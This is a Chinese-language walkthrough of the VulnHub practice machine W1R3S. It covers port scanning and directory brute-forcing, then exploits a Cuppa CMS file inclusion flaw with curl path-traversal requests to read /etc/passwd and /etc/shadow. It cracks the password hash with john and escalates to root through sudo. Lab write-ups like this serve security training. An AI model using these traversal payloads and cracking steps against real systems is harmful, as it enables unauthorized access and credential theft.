靶机地址:W1R3S: 1 ~ VulnHub
难易程度:1.5 / 10.0文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!
摘要:扫描后再80端口的/administrator目录下发现该网站是Cuppa CMS框架,google其CMS相关漏洞,有一个L/RFI漏洞,通过curl获取到passwd和shadow文件信息,使用john将其中的W1R3S密码破解出来,登录进直接sudo提权
可完善的地方:本地/远程文件包含漏洞的研究
主机探测&端口扫描
靶机ip为:192.168.42.131
端口扫描结果:
hhh@Kali2020:~$ nmap -A -sV -T5 -p- 192.168.42.131
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 14:55 CST
Nmap scan report for 192.168.42.131
Host is up (0.00022s latency).
Not shown: 55528 filtered ports, 10003 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
| drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
|_drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.42.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 07:e3:5a:5c:c8:18:65:b0:5f:6e:f7:75:c7:7e:11:e0 (RSA)
| 256 03:ab:9a:ed:0c:9b:32:26:44:13:ad:b0:b0:96:c3:1e (ECDSA)
|_ 256 3d:6d:d2:4b:46:e8:c9:a3:49:e0:93:56:22:2e:e3:54 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL (unauthorized)
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.83 seconds
信息搜集
21端口 ftp服务
- 先连接上ftp服务
ftp 192.168.42.131
根据之前学的VRFY命令,再尝试了之并没有用,继续
- 查看目录列表,依次进入各个目录下
查看到一些无关信息,也提示不是在ftp进行渗透的
80端口
使用dirb进行目录爆破,在访问到administrator目录下发现是Cuppa CMS的框架
dirb http://192.168.42.131
---- Scanning URL: http://192.168.42.131/ ----
==> DIRECTORY: http://192.168.42.131/administrator/
+ http://192.168.42.131/index.html (CODE:200|SIZE:11321)
==> DIRECTORY: http://192.168.42.131/javascript/
+ http://192.168.42.131/server-status (CODE:403|SIZE:302)
==> DIRECTORY: http://192.168.42.131/wordpress/
搜索关于Cuppa CMS 框架的相关漏洞,找到一个Local/Remote File Inclusion
(本地/远程包含漏洞)
https://www.exploit-db.com/exploits/25971
根据里面的内容,尝试下面的代码,但是无果。
http://192.168.42.131/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
使用curl利用LFI漏洞获取信息 curl相关用法
获取/etc/passwd
信息
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.42.131/administrator/alerts/alertConfigField.php
获取/etc/shadow
信息
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.42.131/administrator/alerts/alertConfigField.php
s:不输出错误和进度信息
--data-urlencode:发送POST请求的数据体(进行了URL编码)
权限获取
在获取到/etc/shadow后,使用john进行破解,将shadow中w1r3s的密码信息复制到txt文件中,命名为password.txt
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
用john进行爆破
john password.txt
得到密码:computer
权限提升
查看靶机的信息 Ubuntu 16.04|Linux Kernel 4.13
w1r3s@W1R3S:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.3 LTS
Release: 16.04
Codename: xenial
w1r3s@W1R3S:~$ uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
途径一:直接sudo
这里直接查看sudo -l
的信息,发现可以直接提权(这些许简单了点)
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
然后直接sudo su
进行提权
sudo su
前往/root目录下查看flag.txt
总结
- LFI漏洞
- curl命令
- /etc/passwd&/etc/shadow
- john密码